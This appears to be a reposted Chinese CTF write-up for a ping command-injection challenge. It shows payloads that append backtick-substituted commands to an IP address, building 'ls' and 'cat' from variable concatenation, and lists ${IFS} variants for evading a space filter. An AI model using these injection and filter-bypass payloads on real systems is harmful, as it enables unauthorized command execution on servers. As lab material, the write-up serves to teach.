zoukankan      html  css  js  c++  java
  • ctf-ping命令执行绕过

    题目连接:http://ctf.klmyssn.com/challenges#Ping

    命令执行绕过,试了试过滤了一些:一些命令

    但是反引号可以执行命令

    技术图片

    通过拼接,可以拼接出来:ls 命令

    127.0.0.1;`a="l";b="s";c=$a$b;$c`

    技术图片

    可以发现 flag 就是下面那一串 flag_ 开头的字符串

    在拼接命令来查看:

    127.0.0.1;`a="ca";b="t${IFS}fla";c="g_ae8e4cd6ce3b5";d=$a$b$c;$d`

    针对空格过滤,可以使用:

    ${IFS}

    <  (也被过滤了)

    $IFS

    $IFS$9

    来代替,但是考虑到在一串字符串中,所以使用 ${IFS} 来代替空格

    技术图片

  • 相关阅读:
    touch
    ls
    Linux基础
    errors
    strconv
    strings
    fmt
    os/exec
    笔记本连不上网怎么办
    笔记本连不上网怎么办
  • 原文地址:https://www.cnblogs.com/-chenxs/p/11495607.html
Copyright © 2011-2022 走看看